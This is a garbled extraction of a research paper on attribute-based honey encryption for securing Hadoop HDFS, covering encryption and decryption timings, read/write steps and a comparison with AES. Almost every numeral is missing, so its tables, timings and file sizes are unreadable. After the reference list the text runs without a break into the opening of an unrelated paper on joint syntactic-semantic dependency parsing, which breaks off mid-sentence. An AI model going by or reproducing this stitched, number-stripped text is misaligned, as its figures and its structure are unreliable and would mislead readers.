at client level, data has been divided into smaller chunks by using parallel computing technique and stored at hdfs in encrypted form. also, the map reduce tasks can be done on encrypted data directly and decrypt before processing after importing the corresponding decryption library. input to a mapreduce job is divided into fixed-size pieces. these are the input splits which is a chunk of the input that is consumed by a single map. at map function, the input data is kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. processed in decrypted form and stored output data in encrypted form into the hdfs. the reduce function is executed on the intermediate results of map function after decryption and the stored final output data in again encrypted form into the hdfs and provided access to the authorized clients only. decryption process is replica of encryption process and both these methods are simple, cost-effective and scalable without deteriorating the performance, scalability or functionality. so, they are easy to recommend and effectively address the security deficiencies with big data clusters. evaluation of performance of the proposed algorithm has also been done. the performance parameter includes encryption–decryption time (rate of encryption is given by encryption time and rate of decryption is given by decryption time), throughput of encryption-decryption where throughput is calculated as the size of plain text (in mb or gb) is divided by the total time during encryption-decryption. the speed and power conumption of encryption-decryption process are mainly dependent on the throughput of the encryption-decryption scheme, as it defines the speed of encryption-decryption. in case of encryption-decryption, as the throughput increases, power consumption decreases. also, authors have compared results with the exsisting hdfs encryption algorithms namely aes and aes-otp with different file sizes (varies from mb to gb). the performance parameters results have shown that the proposed abhe scheme with hadoop environment is a considerable improvement over aes, aes with otp (integrating with hadoop). also, the proposed algorithm provides the security for data stored at hdfs and distributed computing against all side channel attacks, brute force attacks and collusion attacks. detailed description is given in the next section. results implementation aes is propositioned to be better than the other secure approaches that address the secure data processing using hadoop hdfs and mapreduce job in context of data encryption. to support this claim, the performance of proposed abhe algorithm has been evaluated in this section and performance of the proposed abhe algorithm has been compared with the existing algorithms, i.e., aes and aes-otp, while doing the same experiment in a standard hadoop setup. the performance is evaluated in terms of throughput and power ponsumption by doing the encryption-decryption techniques on different sizes of files (size varies from mb to gb). implementation environment the implementations and experiments are based on hadoop cluster. the hadoop cluster consists of one host which runs on laptop with intel core i - m processor . ghz with turbo boost upto . ghz and gb ram. in this, one of the host is tagged as namenode and other is used as a datanode. namenode playsa role of centre point in cluster and all information about the stored data is saved on it. for simplicity, there is only one namenode and one datanode in a hadoop cluster with one run. datanode provides the physical space for storing data. the operating system of the host is linux with centos . , ubuntu- . (gnu/ linux . . - -generic x - ). on top of the operating kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. system is hadoop with version . . . single node architecture of hadoop is used in which all components of the hadoop are on the same node. implementation and stand-alone applications are written in java. as hadoop requires jdk for its working so, java open java development kit (jdk) is installed on the system using the <apt-get>command. the running component of the hadoop can be checked using the <jps>command. hdfs distribution process overcomes outages, acts as a backup while maximising the availability of the services. results of the experiment in this section, we present the results and analysis of our proposed algorithm versus the available securing approaches. in the proposed encryption technique, at first, we apply the attribute based encryption which is based on cipher text policy based attribute encryption. the proposed approach uses a specific type of encrypted access control wherein user’s private-key is super imposed with an access policy over a set of attributes within the system. a user can decrypt a cipher text only if his attributes satisfy the set of rules of the respective cipher-text. an enhance security to ensure full safety against all side channel & brute force attack, the proposed algorithm is combined with honey encryption algorithm. the combination of these two algorithms, i.e., the abhe provides a stronger security against confidentially & brute force attack and all side channel as well as collusion attacks as encryption is not easy to break and get the actual data. the performance of abhe has been calculated in terms of file size, encryption time, decryption time and power consumption and compared with two existing encryption algorithms namely; aes and aes with otp applying on different sizes of text files. the working of the proposed algorithm has been demonstrated in figs. and . file size the proposed encryption algorithm reduces the encryption-decryption time without affecting the size of original file. here, the file named mb.txt is of size . gb and contains blocks starting from to . the size of block to block is remains unchanged after encryption while size of block is changed from bytes to byte which is insignificant and shown in figs. – . also, the output file size when encrypted a file of size gb using aes, aes-otp and the proposed approach is compared which is shown in table . encryption time using abhe this is the time taken by encryption algorithm to produce a cipher-text from plain-text. encryption is performed while writing the file on hadoop so that the stored data can be saved from various attacks. this process involves a number of steps which has been shown as follows: i. hdfs client interacts with namenode by calling the create() function on distributed file system (dfs). ii. dfs sends a request to namenode to create a new file. kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure working of the proposed abhe encryption algorithm when attribute and password are en- tered for mb file size (for both encryption and decryption). full-size doi: . /peerjcs. /fig- figure working of proposed abhe encryption algorithm when right and wrong password are en- tered for mb file size. full-size doi: . /peerjcs. /fig- iii. namenodes provide address of the datanode, i.e., slave which is based on the availability of space and capacity in datanode on which hdfs client is going to start writing encrypted data. iv. the hdfs client starts entering the attributes to encrypt the file. after that for more security, it applies the password which is based on honey encryption. now the hdfs client starts writing data though fs data outputstream to specific slave for a specified block. kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure size block one before encryption. full-size doi: . /peerjcs. /fig- v. the slave starts copying the block to another slave when hdfs client has finished writing the blocks. vi. during the block copying and replication process, metadata of the file is updated in the namenode by datanode. (datanode provides the periodically heartbeat signal to the namenode). vii. after the successful completion of write operation,datanode sends the acknowledge- ment to hdfs client through dfs. viii. after that hdfs client closes the process. ix. write operation is closed after receiving the acknowledgement from hdfs client. the complete operation (with above steps i.e., i, ii, iii...) is explained in fig. . as shown in table , it took . min for the encrypted hdfs using aes algorithm, whereas it took . min for the encrypted hdfs using aes with otp algorithm. on the other hand, the proposed approach took only . min to encrypt gb file in hdfs as shown in table . data decryption time using abhe it is the time taken by decryption approach abhe to produce the plain-text from cipher- text. with our proposed cryptographic scheme, whenever a node will try to read a file on hdfs it will first have to decrypt the file. then only it will be allowed to perform reads operation. this has been done in the proposed approach to filter out the intruders or unauthorized access. following is the step-by-step process on how read operation is performed in hdfs with the proposed approach: i. first of all hdfs client interacts with namenode by calling the read function on distributed file system (dfs). kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure size of block one after encryption. full-size doi: . /peerjcs. /fig- figure size of block eight before encryption. full-size doi: . /peerjcs. /fig- ii. dfs sends a request to namenode for reading a file. iii. namenode provides address of the datanode, i.e., slave on which hdfs client will start reading the data. iv. for hdfs client to start reading data through fs data inputstream from specified slave and from a specified block, firstly it has to enter the correct password. if password does not match, the user will be treated as an intruder. if the password matches, the genuine user has to enter the private key which has already been created while encrypting the file. again, if private key does not match, the user will not be allowed to access the file. on matching, the user will be able to successfully decrypt the file. kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure size of block eight after encryption. full-size doi: . /peerjcs. /fig- table file size comparison among aes and aes with otp algorithms and the proposed abhe algo- rithm. file size (mb) aes algorithm (mb) aes with otp algorithm (mb) proposed abhe algorithm (mb) . . . . . . . . , , , . , v. after a successful completion of read operation, hdfs client terminates read operation. vi. read operation is closed after receiving the acknowledgement from hdfs client. vii. as it has been shown in step , the proposed approach provides dual layer security to the data stored in hdfs. step-wise demonstration of decryption operation is shown in fig. . when using the proposed approach for decryption of gb file on mapper job, it took . min. on the other hand, the existing algorithms, i.e., aes and aes with otp respectively to . and . , respectively for decrypting gb file as shown in table . the values for each criterion was logged and graphically plotted to represent the results as shown in figs. and . further, these figures show the comparative time taken (in minutes) during the encryption and decryption process by different algorithms i.e., aes, aes with otp and proposed algorithm (abhe). from figs. and , it is clear that the kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure writing a file with encryption in hdfs. full-size doi: . /peerjcs. /fig- table file encryption performance comparison among aes and aes with otp algorithms and the proposed abhe algorithm. file size (mb) aes algorithm (minutes) aes with otp algorithm (minutes) proposed abhe algorithm (minutes) . . . . . . . . . . . . , . . . total encryption time . . . throughput of encryption (mb/minutes) . . . proposed algorithm is taking less time for encryption and decryption as compared to other existing algorithms in hadoop environment. when the proposed abhe algorithm is integrated with hadoop, it showed better performance than the previously available cryptographic algorithm. from the results of tables – , it is clear that: • the proposed algorithm abhe is taking less time to encrypt and decrypt text files than the aes, aes with otp algorithms. • the throughput of abhe is very high as compared to the aes, aes with otp algorithms. • as the throughput increases, the power consumption decreases, hence the power consumption of abhe is low than that of the aes, aes with otp. kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure reading a file with decryption in hdfs. full-size doi: . /peerjcs. /fig- table file decryption performance comparison among aes and aes with otp algorithm and the proposed abhe algorithm. file size (mb) aes algorithm (minutes) aes with otp algorithm (minutes) proposed abhe algorithm (minutes) . . . . . . . . . . . . , . . . total decryption time . . . throughput of decryption (mb/minutes) . . . furthermore, for analyzing the performance of the proposed encryption technique with sharing data between two different datanodes in hadoop environment, the same has been simulated with random text file size mb (in terms of block size) before and after encryption shown in figs. and . also, the browse directory show that encrypted file and abc.txt non-encrypted file hdfs in fig. . discussion the proposed study has been able to successfully solve the weaknesses present in the security approaches available for big data security. the significance of the proposed work is as follows: kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure encryption time (minutes) of aes, aes with otp and proposed abhe algorithm. full-size doi: . /peerjcs. /fig- figure decryption time (minutes) of aes, aes with otp and proposed abhe algorithm. full-size doi: . /peerjcs. /fig- • proposed encryption technique which uses the concept of attributes based honey encryption (abhe) may help to securing sensitive information stored at hdfs in insecure environment such as the internet and cloud storages. • proposed technique provides both hdfs and map reduce computation in the hadoop as well as cloud environment to secure and preserve the integrity of data during execution kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure size of block five before encryption. full-size doi: . /peerjcs. /fig- figure size of block five after encryption. full-size doi: . /peerjcs. /fig- or at rest. therefore, we have directed our efforts in securing the data transfer and computation paradigm in hadoop environment by using chipper text policy attributes based honey encryption and honey encryption for secret share of tuple of data and sent them to the cloud in a secure manner. • the chipper text policy attributes based encryption makes the application secure and has a high performance when compared with the rest of the encryption techniques. also, it provides the secure data transfer to all cloud applications. kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure browse directory show that encrypted file and abc.txt non-encrypted file hdfs. full-size doi: . /peerjcs. /fig- • in the proposed algorithm, we have assured the data security by using simplified chipper text policy attribute based encryption with honey encryption which is difficult to decrypt by any unauthorized access. • the user authorization access is based on the user define policy which reflects the overall organizational structure and also, depends upon a set of attributes within the system. • with the proposed algorithm, the security of data is not only dependent on the secrecy of encryption algorithm but also on the security of the key. this provides dual layer security for the data. conclusion in this proposed approach, we mainly concentrated on protection of big data stored in hdfs by integrating the proposed abhe algorithm with hadoop key management server. in a nutshell, for ensuring data security in hadoop environment through the proposed encryption technique, hdfs files are encrypted by using attribute based honey encryption through the proposed abhe algorithm. for evaluating the suggested technique, we carried out some experiments using two data nodes. our objective was to experiment and gauge the effectiveness of abhe algorithm. for accuracy in sharing secret key, data sharing between different clients and speed with which each file stored in hdfs. as the proposed abhe algorithm, execution time (a function of encryption time) is less as compared to the other available approaches. this proves that the proposed technique is fast enough to secure the data without adding delay. also, the proposed abhe algorithm has a higher throughput which proves its applicability on big data. it provides a feasible solution for secure communication between one datanode to other datanode. the proposed encryption technique does not increase the file size therefore it saves the memory and bandwidth, and hence reduces traffic in a network. also, it has an ability to encrypt kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. structured as well as unstructured data under a single platform. only hdfs client can encrypt or decrypt data with accurate attributes and password. the proposed technique provides a dual layer security for all datanode as data is not confined to a specific device and clients can access the system and data from anywhere. this encryption approach may be reckoned as a premise for visualizing and designing even more robust approaches to ensure optimum security of big data. additional information and declarations funding this work is sponsored by council of science & technology, uttar pradesh, india under f. no. cst/d- . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: council of science & technology, uttar pradesh, india. competing interests the authors declare there are no competing interests. author contributions • gayatri kapil conceived and designed the experiments, performed the experiments, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • alka agrawal conceived and designed the experiments, performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • abdulaziz attaallah conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • abdullah algarni performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • rajeev kumar and raees ahmad khan conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: code is available as a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. references atallah m, frikken k, blanton m. . dynamic and efficient key management for access hierarchies. in: proc. of ccs’ . bardi m, xianwei z, shuai l, fuhong l. . big data security and privacy: a review. china communication ( ): – doi . /cc. . . bellare m, ristenpart t, rogaway t, stegers p. . format-preserving encryption. in: international workshop on selected areas in cryptography. – . cheikh ab, abbes h, fedak g. . towards privacy for mapreduce on hybrid clouds using information dispersal algorithm. in: data management in cloud, grid and p p systems— th international conference, globe , munich, germany, september – . proceedings, munich, germany, . – . choi h, nam h, hur j. . password typos resilience in honey encryption. in: ieee international conference in information networking (icoin). – . cohen jc, acharya s. . toward a trusted hdfs storage platform: mitigating threats to hadoop infrastructure using hardware-accelerated encryption with tpm-rooted key protection. journal of information security and applications ( ): – . colombo p, ferrari e. . access control in the era of big data: state of the art and research directions. in: blue sky session: innovation in access control and privacy-aware data management for big data and iot, sacmat’ , june – . derbeko p, dolev s, gudes e, sharm s. . security and privacy aspects in mapre- duce on clouds: a survey. journal computer science review (no. c): – doi . /j.cosrev. . . . dinh tta, saxena p, cang e-c, ooi bc, zhang c. . m r: enabling stronger privacy in mapreduce computation. in: proceedings of the th usenix security symposium (security). washington, dc. dolev s, gupta p, li y, mehrotra s, sharma s. . privacy-preserving secret shared computations using mapreduce. available at https://arxiv.org/abs/ . . dyer kp, coull se, ristenpart t, shrimpton t. . protocol misidentification made easy with format-transforming encryption. in: proceedings of the acm sigsac conference on computer and communications security. acm, – . ebrahim m, khan s, khalid ub. . khalid ub symmetric algorithm survey: a comparative analysis. international journal of computer applications ( ): – . fu x, gao y, luo b, du x, guizani m. . security threats to hadoop: data leakage attacks and investigation. ieee network ( ): – doi . /mnet. . nm. gupta m, patwa f, sandhu r. . attribute-based access control model for secure big data processing in hadoop ecosystem. in: processing’s of the third acm workshop on attribute-based access control-abac- . – doi . / . . jain p, sardana a. . defending against internet worms using honey farm. in: acm in proceedings of the cube international information technology conference. new york: acm, – . kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /cc. . http://dx.doi.org/ . /j.cosrev. . . https://arxiv.org/abs/ . http://dx.doi.org/ . /mnet. . nm http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. jam mr, akbari mk, khanli lm. . a survey on security of hadoop. in: th interna- tional conference on computer and knowledge engineering (iccke). – . jeong ys, kim yt. . a token-based authentication security scheme for hadoop distributed file system using elliptic curve cryptography. journal of computer virology and hacking techniques : – doi . /s - - - . juels a, ristenpart t. . honey encryption: security beyond the brute-force bound. in: advances in cryptology-eurocrypt . – . kim is, kim mh. . agent-based honey net framework for protecting servers in cam- pus networks. iet information security ( ): – doi . /iet-ifs. . . lu w, wang y, juang j, liu j, shen y, wei b. . hybrid storage architecture and efficient mapreduce processing for unstructured data. parallel computing : – doi . /j.parco. . . . maheswari mi, revathy s, tamilarasi r. . secure data transmission for multi sharing in big data storage. indian journal of science and technology ( ) doi . /ijst/ /v i / . mahmoud h, hegazy a, khafagy mh. . an approach for big data security based on hadoop distributed file system. in: international conference on innovative trends in computer engineering (itce). doi . /itce. . . mehmood a, natgunanathan i, xiang y. . protection of big data privacy. in: ieee protection of big data privacy, in ieee access, vol. . piscataway: ieee, – doi . /access. . . mohan rao pr, krishna sm, kumar aps. . privacy preservation techniques in big data analytics: a survey. journal of big data :article doi . /s - - - . nguyen tc, shen w, jiang j, xu w. . a novel data encryption in hdfs, ieee international conference on green computing and communications and ieee internet of things and ieee cyber. physical and social computing : – doi . /greencom-ithings-cpscom. . . oktay y, mehrotra s, khadilkar v, kantarcioglu m. . semrod: secure and efficient mapreduce over hybrid clouds. in: proceedings of the acm sigmod international conference on management of data, melbourne, victoria, australia, may —june , . – . owezarski p. . a near real-time algorithm for autonomous identification and characterization of honey pot attacks. in: proceedings of the th acm symposium on information, computer and communications security. – . park s, lee y. . secure hadoop with encrypted hdfs. in: park jj, arabnia hr, kim c, shi w, gil jm, eds. grid and pervasive computing. gpc . lecture notes in computer science, vol. . berlin, heidelberg: springer doi . / - - - - _ . polato i, re r, goldmn a, kon f. . a comprehensive view of hadoopreseach—a systematic literature review. journal of network and computer applications : – doi . /j.jnca. . . . kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /iet-ifs. . http://dx.doi.org/ . /j.parco. . . http://dx.doi.org/ . /ijst/ /v i / http://dx.doi.org/ . /itce. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /greencom-ithings-cpscom. . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.jnca. . . http://dx.doi.org/ . /peerj-cs. rerzi ds, terzi r, sagiroglu s. . a survey on security and privacy issues in big data. in: th international conference for internet technology and secured transactions (icitst). – doi . /jicitst. . . schuster f, costa m, fournet c, gkantsidis c, peinado m, mainar-ruiz g, russinovich m. . vc : trustworthy data analytics in the cloud using sgx. in: proceedings of the th ieee symposium on security and privacy (oakland). – . scrinivasan mk, revthy p. . state-of-the-art big data security taxonomies. in: proceeding of the th innovation in software engineering conference—isec. doi . / . . shobha k, nickolas s. . time domain attribute based encryption for big data access control in cloud environment. accents transactions on information security ( ): – doi . /tis. . . song y, shin ys, jang m, chang jw. . design and implementation of hdfs data encryption scheme using aria algorithm on hadoop. in: ieee international confer- ence on big data and smart computing (bigcomp) doi . /bigcomp. . . sudhakar k, farquad mah, narshimha g. . effective convolution method for privacy preserving in cloud over big data using map reduce framework. iet software : – doi . /iet-sen. . . tan sf, samsudin a. . enhanced security of internet banking authentication with extended honey encryption (xhe) scheme. in: zelinka i, vasant p, duy v, dao t, eds. innovative computing, optimization and its applications. studies in computational intelligence, vol. . cham: springer doi . / - - - - _ . tian y. . towards the development of best data security for big data. communication and network : – doi . /cn. . . tyagi n, wang j, wen k, zuo d. . honey encryption applications. network security : – . ulusoy h, kantarcioglu m, pattuk e, hamlen k. . vigiles: fine-grained access control for mapreduce systems. in: ieee international congress on big data anchorage, ak, , – doi . /bigdata.congress. . . usama m, zakaria n. . chaos-based simultaneous compression and encryption for hadoop. plos one ( ):e doi . /journal.pone. . varsha bs, suryateja ps. . using attribute- based encryption with advanced encryption standard for secure and scalable sharing of personal health records in cloud. international journal of computer science and information technologies ( ): – . vimercati sdc, foresti s, jajodia s, paraboschi s, samarati p. . over-encryption: management of access control evolution on outsourced data. in: proc. of vldb’ . vinayak pp, nahala ma. . avoiding brute force attack in manet using honey encryption. international journal of science and research ( ): – . vormetric data security. . hadoop: security recommendation for hadoop environments. available at https://securosis.com/assets/library/reports/securing_ hadoop_final_v .pdf . kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /jicitst. . http://dx.doi.org/ . / . http://dx.doi.org/ . /tis. . http://dx.doi.org/ . /bigcomp. . http://dx.doi.org/ . /iet-sen. . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /cn. . http://dx.doi.org/ . /bigdata.congress. . http://dx.doi.org/ . /journal.pone. https://securosis.com/assets/library/reports/securing_hadoop_final_v .pdf https://securosis.com/assets/library/reports/securing_hadoop_final_v .pdf http://dx.doi.org/ . /peerj-cs. wang y, shen y, wang h, cao j, jiang x. . mtmr: ensuring mapreduce compu- tation integrity with merkle tree-based verifications. ieee transactions on big data ( ): – doi . /tbdata. . . wikipedia. . honey encryption. available at https://en.m.wikipedia.org/wiki/honey_ encryption. xu l, wu x, zhang x. . cl-pre: a certificate less proxy re-encryption scheme for secure data sharing with public cloud. in: acm symposium on information, computer and communications security (asiaccs’ ). new york: acm, – . yalla c, gill a, gupta m, mohankumar h, mccloskey t, minas l, ngo n, tolentino s, watson d. . big data: security intel it’s apache hadoop platform. white paper, intel. available at https://www.intel.com/content/www/us/en/it-management/intel- it-best-practices/big-data-securing-intel-it-apache-hadoop-platform-paper.html. yang c, lin w, liu m. . a novel triple encryption scheme for hadoop-based cloud data security. in: emerging intelligent data and web technologies (eidwt), fourth international conference. – . yin w, lska ji, zhou h. . protecting private data by honey encryption. hindawi se- curity and communication networks :article doi . / / . yu s, wang c, ren k, lou w. a. achieving secure, scalable, and fine-grained access control in cloud computing. in: proc. of ieee infocom’ . san diego. yu s, wang c, ren k, lou w. b. achieving secure, scalable, and fine-grained data access control in cloud computing. communications society ieee infocom. zettaset. . the big data security gap: protecting the hadoop cluster. white paper. available at https://www.zettaset.com/wp-content/uploads/ / /zettaset_wp_ security_ .pdf . zhao j, wang l, tao j, chen j, sun w, ranjan r, kolodziej j, streit a, georgakopoulos d. . a security framework in g-hadoop for big data computing across dis- tributed cloud data centres. journal of computer and system sciences : – doi . /j.jcss. . . . zhao t, wei l, zhang c. . attribute- based encryption scheme based on siff. in: ieee icc communication and information system security symposium. zhou h, wen q. . data security accessing for hdfs based on attribute-group in cloud computing. in: international conference on logistics engineering, management and computer science. – . kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tbdata. . https://en.m.wikipedia.org/wiki/honey_encryption https://en.m.wikipedia.org/wiki/honey_encryption https://www.intel.com/content/www/us/en/it-management/intel-it-best-practices/big-data-securing-intel-it-apache-hadoop-platform-paper.html https://www.intel.com/content/www/us/en/it-management/intel-it-best-practices/big-data-securing-intel-it-apache-hadoop-platform-paper.html http://dx.doi.org/ . / / https://www.zettaset.com/wp-content/uploads/ / /zettaset_wp_security_ .pdf https://www.zettaset.com/wp-content/uploads/ / /zettaset_wp_security_ .pdf http://dx.doi.org/ . /j.jcss. . . http://dx.doi.org/ . /peerj-cs. transactions of the association for computational linguistics, ( ) – . action editor: brian roark. submitted / ; revised / ; published / . c© association for computational linguistics. joint arc-factored parsing of syntactic and semantic dependencies xavier lluı́s and xavier carreras and lluı́s màrquez talp research center universitat politècnica de catalunya jordi girona – , barcelona {xlluis,carreras,lluism}@lsi.upc.edu abstract in this paper we introduce a joint arc-factored model for syntactic and semantic dependency parsing. the semantic role labeler predicts the full syntactic paths that connect predicates with their arguments. this process is framed as a linear assignment task, which allows to control some well-formedness constraints. for the syntactic part, we define a standard arc-factored dependency model that predicts the full syntactic tree. finally, we employ dual decomposition techniques to produce consis- tent syntactic and predicate-argument struc- tures while searching over a large space of syntactic configurations. in experiments on the conll- english benchmark we ob- serve very competitive results. introduction semantic role labeling (srl) is the task of identi- fying the arguments of lexical predicates in a sen- tence and labeling them with semantic roles (gildea and jurafsky, ; màrquez et al., ). srl is an important shallow semantic task in nlp since predicate-argument relations directly represent se- mantic properties of the type “who” did “what” to “whom”, “how”, and “why” for events expressed by predicates (typically verbs and nouns). predicate-argument relations are strongly related to the syntactic structure of the sentence: the ma- jority of predicate arguments correspond to some syntactic constituent, and the syntactic structure that connects an argument with the predicate is a strong indicator of its semantic role. actually, semantic roles represent an abstraction of the syntactic form of a predicative event. while syntactic functions of arguments change with the form of the event (e.g., active vs. passive forms), the semantic roles of argu- ments remain invariant to their syntactic realization. consequently, since the first works, srl systems have assumed access to the syntactic structure of the sentence (gildea and jurafsky, ; carreras and màrquez, ). a simple approach is to obtain the parse trees as a pre-process to the srl system, which allows the use of unrestricted features of the syntax. however, as in other pipeline approaches in nlp, it has been shown that the errors of the syn- tactic parser severely degrade the predictions of the srl model (gildea and palmer, ). a common approach to alleviate this problem is to work with multiple alternative syntactic trees and let the srl system optimize over any input tree or part of it (toutanova et al., ; punyakanok et al., ). as a step further, more recent work has proposed parsing models that predict syntactic structure aug- mented with semantic predicate-argument relations (surdeanu et al., ; hajič et al., ; johansson, ; titov et al., ; lluı́s et al., ), which is the focus of this paper. these joint models should favor the syntactic structure that is most consistent with the semantic predicate-argument structures of a sentence. in principle, these models can exploit syntactic and semantic features simultaneously, and could potentially improve the accuracy for both syn- tactic and semantic relations. one difficulty in the design of joint syntactic- semantic parsing models is that there exist impor- tant structural divergences between the two layers. mary loves to play guitar . � sbj oprd im obj p arg arg arg arg figure : an example . . . das et al. ( ) . . . riedel and mccallum ( ) . . . a syntactic-semantic dependency model we will describe structures of syntactic and seman- tic dependencies with vectors of binary variables. we will denote by yh,m,l a syntactic dependency from head token h to dependant token m labeled with syntactic function l. similarly we will denote by zp,a,r a semantic dependency between predicate token p and argument token a labeled with seman- tic role r. we will use y and z to denote vectors of binary variables indexed by syntactic and semantic dependencies, respectively. a joint model for syntactic and semantic depen- dency parsing could be defined as: argmax y,z s syn(x, y) + s srl(x, z, y) . in the equation, s syn(x, y) gives a score for the syntactic tree y. in the literature, it is standard to use arc-factored models defined as s syn(x, y) = � yh,m,l= s syn(x, h, m, l) , where we overload s syn to be a function that computes scores for individual labeled syntactic dependencies. in discriminative models one has s syn(x, h, m, l) = wsyn · fsyn(x, h, m, l), where fsyn is a feature vector for the syntactic dependency and wsyn is a vector of parameters (mcdonald et al., ). the other term, s srl(x, z, y), gives a score for a semantic dependency structure using the syntactic structure y as features. previous work has empiri- cally proved the importance of exploiting syntactic features in the semantic component (gildea and ju- rafsky, ; xue and palmer, ; punyakanok et al., ). however, without further assumptions, this property makes the optimization problem com- putationally hard. one simple approximation is to use a pipeline model: first compute the optimal syn- tactic tree, and then optimize for the best semantic structure given the syntactic tree. in the rest of the paper we describe a method that searches over syn- tactic and semantic dependency structures jointly. we first impose the assumption that syntactic fea- tures of the semantic component are restricted to the syntactic path between a predicate and an argument, following previous work (johansson, ). for- mally, for a predicate p, argument a and role r we will define a vector of dependency indicators πp,a,r similar to the ones above: πp,a,rh,m,l indicates if a de- pendency �h, m, l� is part of the syntactic path that links predicate p with token a. figure gives an ex- ample of one such paths. given full syntactic and semantic structures y and z it is trivial to construct a vector π that is a concatenation of vectors πp,a,r for all �p, a, r� in z. we can now define a linear seman- tic model as s srl(x, z, π) = � zp,a,r= s srl(x, p, a, r, πp,a,r) , ( ) where s srl computes a score for a semantic de- pendency �p, a, r� together with its syntactic path πp,a,r. as in the syntactic component, this function is typically defined as a linear function over a set of features of the semantic dependency and its path. with this joint model, the inference problem can be formulated as: argmax y,z,π s syn(x, y) + s srl(x, z, π) ( ) subject to ctree : y is a valid dependency tree crole : ∀p, r : � a zp,a,r ≤ carg : ∀p, a : � r zp,a,r ≤ cpath : ∀p, a, r : if zp,a,r = then πp,a,r is a path from p to a otherwise πp,a,r = csubtree : ∀p, r, a : πp,r,a is a subtree of y figure : a sentence with syntactic dependencies (top) and semantic dependencies for the predicates “loves” and “play” (bottom). the thick arcs illustrate a structural di- vergence where the argument “mary” is linked to “play” with a path involving three syntactic dependencies. this is clearly seen in dependency-based representa- tions of syntax and semantic roles (surdeanu et al., ), such as in the example in figure : the con- struct “loves to” causes the argument “mary” to be syntactically distant from the predicate “play”. lin- guistic phenomena such as auxiliary verbs, control and raising, typically result in syntactic structures where semantic arguments are not among the direct dependants of their predicate —e.g., about % of arguments are distant in the english development set of the conll- shared task. besides, standard models for dependency parsing crucially depend on arc factorizations of the dependency structure (mc- donald et al., ; nivre and nilsson, ), other- wise their computational properties break. hence, it is challenging to define efficient methods for syntac- tic and semantic dependency parsing that can exploit features of both layers simultaneously. in this paper we propose a method for this joint task. in our method we define predicate-centric seman- tic models that, rather than predicting just the ar- gument that realizes each semantic role, they pre- dict the full syntactic path that connects the predi- cate with the argument. we show how efficient pre- dictions with these models can be made using as- signment algorithms in bipartite graphs. simulta- neously, we use a standard arc-factored dependency model that predicts the full syntactic tree of the sen- tence. finally, we employ dual decomposition tech- niques (koo et al., ; rush et al., ; sontag et al., ) to find agreement between the full de- pendency tree and the partial syntactic trees linking each predicate with its arguments. in summary, the main contributions of this paper are: • we frame srl as a weighted assignment prob- lem in a bipartite graph. under this framework we can control assignment constraints between roles and arguments. key to our method, we can efficiently search over a large space of syn- tactic realizations of semantic arguments. • we solve joint inference of syntactic and se- mantic dependencies with a dual decomposi- tion method, similar to that of koo et al. ( ). our system produces consistent syntactic and predicate-argument structures while searching over a large space of syntactic configurations. in the experimental section we compare joint and pipeline models. the final results of our joint syntactic-semantic system are competitive with the state-of-the-art and improve over the best results published by a joint method on the conll- english dataset. a syntactic-semantic dependency model we first describe how we represent structures of syn- tactic and semantic dependencies like the one in fig- ure . throughout the paper, we will assume a fixed input sentence x with n tokens where lexical predi- cates are marked. we will also assume fixed sets of syntactic functions rsyn and semantic roles rsem. we will represent depencency structures using vec- tors of binary variables. a variable yh,m,l 